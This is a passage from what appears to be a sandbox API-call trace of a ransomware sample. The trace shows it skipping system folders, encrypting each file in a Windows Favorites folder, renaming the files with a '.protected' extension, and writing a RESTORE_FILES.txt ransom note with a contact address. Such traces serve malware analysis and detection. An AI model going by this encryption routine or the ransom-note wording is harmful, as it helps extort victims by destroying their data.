(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.173] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0095.173] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.173] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0095.173] CloseHandle (hObject=0xb4) returned 1 [0095.174] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.174] lstrcmpiW (lpString1="Microsoft Websites", lpString2="Windows") returned -1 [0095.174] lstrcmpiW (lpString1="Microsoft Websites", lpString2="Program Files") returned -1 [0095.174] lstrcmpiW (lpString1="Microsoft Websites", lpString2="Program Files (x86)") returned -1 [0095.174] lstrcmpiW (lpString1="Microsoft Websites", lpString2="$Recycle.bin") returned 1 [0095.174] lstrcmpiW (lpString1="Microsoft Websites", lpString2="System Volume Information") returned -1 [0095.174] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites") returned 49 [0095.174] lstrcmpW (lpString1="Microsoft Websites", lpString2=".") returned 1 [0095.174] lstrcmpW (lpString1="Microsoft Websites", lpString2="..") returned 1 [0095.174] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*") returned 51 [0095.174] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0095.181] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.181] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.181] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.181] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.181] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.181] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\.") returned 51 [0095.181] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.181] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.181] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.181] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.181] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.181] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.181] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.181] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\..") returned 52 [0095.181] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.181] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.181] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.181] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="Windows") returned -1 [0095.181] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="Program Files") returned -1 [0095.181] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="Program Files (x86)") returned -1 [0095.181] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="$Recycle.bin") returned 1 [0095.181] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="System Volume Information") returned -1 [0095.182] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 68 [0095.182] StrStrIW (lpFirst="IE Add-on site.url", lpSrch=".protected") returned 0x0 [0095.182] lstrcmpW (lpString1="IE Add-on site.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.182] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.182] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.182] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 68 [0095.182] StrStrW (lpFirst="IE Add-on site.url", lpSrch=".txt") returned 0x0 [0095.182] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 68 [0095.182] StrStrW (lpFirst="IE Add-on site.url", lpSrch=".rar") returned 0x0 [0095.182] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 68 [0095.182] StrStrW (lpFirst="IE Add-on site.url", lpSrch=".zip") returned 0x0 [0095.182] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.184] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.184] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.184] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.184] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.184] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.184] CloseHandle (hObject=0xd4) returned 1 [0095.185] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.protected") returned 78 [0095.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.protected" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.protected")) returned 1 [0095.186] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.186] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="Windows") returned -1 [0095.186] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="Program Files") returned -1 [0095.186] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="Program Files (x86)") returned -1 [0095.186] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="$Recycle.bin") returned 1 [0095.186] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="System Volume Information") returned -1 [0095.186] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 78 [0095.186] StrStrIW (lpFirst="IE site on Microsoft.com.url", lpSrch=".protected") returned 0x0 [0095.186] lstrcmpW (lpString1="IE site on Microsoft.com.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.186] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.186] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.186] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 78 [0095.186] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch=".txt") returned 0x0 [0095.187] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 78 [0095.187] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch=".rar") returned 0x0 [0095.187] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 78 [0095.187] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch=".zip") returned 0x0 [0095.187] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.187] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.188] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.188] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.188] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.188] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.189] CloseHandle (hObject=0xd4) returned 1 [0095.189] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.protected") returned 88 [0095.189] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.protected" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url.protected")) returned 1 [0095.190] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.190] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="Windows") returned -1 [0095.190] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="Program Files") returned -1 [0095.190] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="Program Files (x86)") returned -1 [0095.190] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="$Recycle.bin") returned 1 [0095.190] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="System Volume Information") returned -1 [0095.190] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 71 [0095.190] StrStrIW (lpFirst="Microsoft At Home.url", lpSrch=".protected") returned 0x0 [0095.190] lstrcmpW (lpString1="Microsoft At Home.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.190] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.190] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.190] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 71 [0095.190] StrStrW (lpFirst="Microsoft At Home.url", lpSrch=".txt") returned 0x0 [0095.190] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 71 [0095.191] StrStrW (lpFirst="Microsoft At Home.url", lpSrch=".rar") returned 0x0 [0095.191] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 71 [0095.191] StrStrW (lpFirst="Microsoft At Home.url", lpSrch=".zip") returned 0x0 [0095.191] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.191] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.192] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.192] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.192] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.192] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.193] CloseHandle (hObject=0xd4) returned 1 [0095.193] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.protected") returned 81 [0095.193] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.protected" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url.protected")) returned 1 [0095.194] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.194] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="Windows") returned -1 [0095.194] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="Program Files") returned -1 [0095.194] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="Program Files (x86)") returned -1 [0095.194] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="$Recycle.bin") returned 1 [0095.194] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="System Volume Information") returned -1 [0095.194] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 71 [0095.194] StrStrIW (lpFirst="Microsoft At Work.url", lpSrch=".protected") returned 0x0 [0095.194] lstrcmpW (lpString1="Microsoft At Work.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.194] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.194] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.195] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 71 [0095.195] StrStrW (lpFirst="Microsoft At Work.url", lpSrch=".txt") returned 0x0 [0095.195] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 71 [0095.195] StrStrW (lpFirst="Microsoft At Work.url", lpSrch=".rar") returned 0x0 [0095.195] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 71 [0095.195] StrStrW (lpFirst="Microsoft At Work.url", lpSrch=".zip") returned 0x0 [0095.195] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.196] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.196] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0095.196] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.197] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.197] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.197] CloseHandle (hObject=0xd4) returned 1 [0095.197] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.protected") returned 81 [0095.197] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.protected" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url.protected")) returned 1 [0095.198] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.198] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="Windows") returned -1 [0095.198] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="Program Files") returned -1 [0095.198] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="Program Files (x86)") returned -1 [0095.198] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="$Recycle.bin") returned 1 [0095.198] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="System Volume Information") returned -1 [0095.198] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 69 [0095.198] StrStrIW (lpFirst="Microsoft Store.url", lpSrch=".protected") returned 0x0 [0095.198] lstrcmpW (lpString1="Microsoft Store.url", lpString2="RESTORE_FILES.txt") returned -1 [0095.198] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.198] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.199] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 69 [0095.199] StrStrW (lpFirst="Microsoft Store.url", lpSrch=".txt") returned 0x0 [0095.199] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 69 [0095.199] StrStrW (lpFirst="Microsoft Store.url", lpSrch=".rar") returned 0x0 [0095.199] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 69 [0095.199] StrStrW (lpFirst="Microsoft Store.url", lpSrch=".zip") returned 0x0 [0095.199] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x86, lpOverlapped=0x0) returned 1 [0095.200] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.200] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x86, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x86, lpOverlapped=0x0) returned 1 [0095.201] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.201] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.201] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.201] CloseHandle (hObject=0xd4) returned 1 [0095.202] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.protected") returned 79 [0095.202] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.protected" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url.protected")) returned 1 [0095.202] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0095.202] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0095.202] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\RESTORE_FILES.txt") returned 67 [0095.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.203] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an 